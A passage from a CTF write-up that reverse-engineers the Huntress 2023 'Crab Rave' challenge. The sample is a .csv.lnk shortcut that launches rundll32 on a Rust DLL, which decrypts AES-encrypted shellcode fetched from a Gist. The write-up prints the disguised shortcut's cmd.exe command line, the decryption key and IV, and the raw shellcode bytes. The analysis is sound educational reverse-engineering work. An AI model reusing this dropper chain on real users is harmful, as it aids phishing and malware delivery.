Parsing out the offset, and the value, the flag is finally formed

19:02:59-rurik@~/CTF/Huntress_2023$ python batchfuscation.py
flag{acad67e3d0b5bf31ac6639360db9d19a}


Crab Rave


As someone who was an avid Beat Saber player, and hopes to be again soon, Crab Rave is near to my heart. The organizers split this into an Easy and Hard challenge. They are literally he same challenge but Easy did not have its symbols stripped. RE on training wheels. So, I focused on the harder one as it is more realistic. 

This challenge came with two files, a DLL and a Windows shortcut semi-disguised as a csv:

company_financial_report_SAFE_NO_VIRUSES.csv.lnk: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=101, Archive, ctime=Fri Jan 15 05:55:23 2021, mtime=Tue Oct 10 15:22:28 2023, atime=Fri Jan 15 05:55:23 2021, length=289792, window=hidentcheckos.dll:                                    PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows

The shortcut can easily be pased by using Silas Cutler's LnkParse script:

20:40:34-rurik@~/CTF/Huntress_2023/done/blog/crab_rave_harder$ lnkparse ./company_financial_report_SAFE_NO_VIRUSES.csv.lnk
Windows Shortcut Information:   Link CLSID: 00021401-0000-0000-C000-000000000046   Link Flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16619)   File Flags: FILE_ATTRIBUTE_ARCHIVE - (32)   Creation Timestamp: 2021-01-15 00:55:23.286643+00:00   Modified Timestamp: 2021-01-15 00:55:23.291147+00:00   Accessed Timestamp: 2023-10-10 10:22:28.019777+00:00<removed for brevity>   DATA      Relative path: ..\..\..\..\..\Windows\System32\cmd.exe      Command line arguments: /c ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && C:\Windows\System32\rundll32.exe ntcheckos.dll,DLLMain      Icon location: C:\Windows\System32\imageres.dll<removed for brevity>

The most important items there are the call to cmd.exe and its command line, forming:

cmd.exe /c ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && C:\Windows\System32\rundll32.exe ntcheckos.dll,DLLMain

Uniquely there are multiple one second sleeps (ping -n 1 127.0.0.1), but it does eventually run the supplied ntcheckos.dll by calling its default DLLMain export routine. This at least helps us what to look at in the binary.

Opening the binary we see a standard 64-bit DLL. Before digging into the binary, we look at strings. There are quite a few that suggest this is a Rust binary.


The first thing that stands out is two calls to the same subroutine. Each sends in a unique set of binary data, a length, then the same long string value with its length:


A quick review within the subroutine finds one small XOR routine that, when cleaned up below, shows that it is just a very simple XOR between the two values.


Knowing that, and having the addresses, you can use whatever method you want to XOR them. I just used a quick IDA Pro script:


The Github Gist URL looks interesting. Visiting it shows just a big block of Base64 data that decrypts to binary information, as below:

>>> gist_data'o2WB/eHh3s+SxgR4QUjE9f0yAt4C16oHZvaclKlmBo4K1bsVSbVS2fjxjao/YVUGv7v7Om5xkDjXxARjF6AZalN6pENSgVBQIrYfMq+VeBwwR1whFWRGIC+qulG6HDYmfZt6Va4iljyljxbSnZMrxQwWUXJDhEju2iVzsa1l6nFzoHWO+5+pDV8+sLn3P9jhfZE7qLKVOt7Lm/stSBWZDgzuvqpZziBYo5EumdrISYvWkMm5T2ZD7iRSQaJ3Hr9LUd0nOnfVLW2CyLNmqAM/BKc0f5A9YAoGISmymjc+camULpCiS4WoI8CiyBKOXr5K3CQgx0O9nOn8aS2IU7RreOopH08EGON6DBzkIwbqpC9o28A+wNZsc6cJC0AplIUAafdONBlg/NmcSmkOnPOAR/qhMGMlZKtzEqi4RZDzOfo='>>> base64.b64decode(gist_data)b'\xa3e\x81\xfd\xe1\xe1\xde\xcf\x92\xc6\x04xAH\xc4\xf5\xfd2\x02\xde\x02\xd7\xaa\x07f\xf6\x9c\x94\xa9f\x06\x8e\n\xd5\xbb\x15I\xb5R\xd9\xf8\xf1\x8d\xaa?aU\x06\xbf\xbb\xfb:nq\x908\xd7\xc4\x04c\x17\xa0\x19jSz\xa4CR\x81PP"\xb6\x1f2\xaf\x95x\x1c0G\\!\x15dF /\xaa\xbaQ\xba\x1c6&}\x9bzU\xae"\x96<\xa5\x8f\x16\xd2\x9d\x93+\xc5\x0c\x16QrC\x84H\xee\xda%s\xb1\xade\xeaqs\xa0u\x8e\xfb\x9f\xa9\r_>\xb0\xb9\xf7?\xd8\xe1}\x91;\xa8\xb2\x95:\xde\xcb\x9b\xfb-H\x15\x99\x0e\x0c\xee\xbe\xaaY\xce X\xa3\x91.\x99\xda\xc8I\x8b\xd6\x90\xc9\xb9OfC\xee$RA\xa2w\x1e\xbfKQ\xdd\':w\xd5-m\x82\xc8\xb3f\xa8\x03?\x04\xa74\x7f\x90=`\n\x06!)\xb2\x9a7>q\xa9\x94.\x90\xa2K\x85\xa8#\xc0\xa2\xc8\x12\x8e^\xbeJ\xdc$ \xc7C\xbd\x9c\xe9\xfci-\x88S\xb4kx\xea)\x1fO\x04\x18\xe3z\x0c\x1c\xe4#\x06\xea\xa4/h\xdb\xc0>\xc0\xd6ls\xa7\t\x0b@)\x94\x85\x00i\xf7N4\x19`\xfc\xd9\x9cJi\x0e\x9c\xf3\x80G\xfa\xa10c%d\xabs\x12\xa8\xb8E\x90\xf39\xfa'

I tried disassembling, and XOR'ing it, but nothing interesting came out of it. Moving on ...

In that same routine we see two unusual strings being referenced. Unusual as in seemingly random alphanumeric strings of each 32 and 16 bytes.

The 32 byte string, rAcbUUWWNFlqMbruiYOIsAyVQHS78orv, is fed into a subroutine that appears to just initialize some data structures with it. That structure us sent to a second routine along with the 16 byte string, MoJ8C6O4D3asAApB. This second routine is the more interesting one. 


Lots of and lots of big math. So, either crypto or hashing. Here, I turn to yara4idb, the latest iteration of SignSrch for IDA, and see what signatures it finds:

Rijndael and AES are essentially the same for our purposes, but there is one explicit call out to AES. Following it shows a block of hex that is, indeed, one of the AES S-boxes, verified from a quick web search.


Now the function makes sense. That binary blob from gist, a 32-byte string, and a 16-byte string would fit together. Knowing just the basics of encryption suggests that a 32-byte string would be the key while the 16-byte string would be the IV. We can quickly test this:

>>>enc=base64.b64decode(gist_data)>>>key=b'rAcbUUWWNFlqMbruiYOIsAyVQHS78orv'>>>iv=b'MoJ8C6O4D3asAApB'>>>dec=malduck.aes.cbc.decrypt(key,iv,enc)>>>decb'\xfcH\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`>H\x8bR\x18>H\x8bR >H\x8brP>H\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQ>H\x8bR >\x8bB<H\x01\xd0>\x8b\x80\x88\x00\x00\x00H\x85\xc0toH\x01\xd0P>\x8bH\x18>D\x8b@ I\x01\xd0\xe3\\H\xff\xc9>A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1>L\x03L$\x08E9\xd1u\xd6X>D\x8b@$I\x01\xd0f>A\x8b\x0cH>D\x8b@\x1cI\x01\xd0>A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZ>H\x8b\x12\xe9I\xff\xff\xff]I\xc7\xc1\x00\x00\x00\x00>H\x8d\x95\xfe\x00\x00\x00>L\x8d\x85%\x01\x00\x00H1\xc9A\xbaE\x83V\x07\xff\xd5H1\xc9A\xba\xf0\xb5\xa2V\xff\xd5flag{225215e04306f6a3c1a59400b054b0df}\x00CONGRATS\x00\x05\x05\x05\x05\x05'

There we shellcode and somewhat easily see "CONGRATS" and the flag.

flag{225215e04306f6a3c1a59400b054b0df}


A big thanks to the Huntress Labs team for a great set of challenges. There were a few surprises that came up, such as challenge data being hosted on sites that certain countries could not access. There were a few reused challenges where the flags were unfortunately found in Google searches. However, this is not unusual it is an incredible amount of effort to create this many challenges. Overall, it unfortunately ended like the last seasons of Game of Thrones with a final challenge that stumbled greatly and prevented many, like myself, from finishing. But it was an excellent idea!


We all have our own backgrounds in this industry, career paths, and unique perspectives. Many of my tactics are not the best, even even good, ones. But, I hope there are a few techniques here that may interest others. 

Viewing all 52 articles
Browse latest View live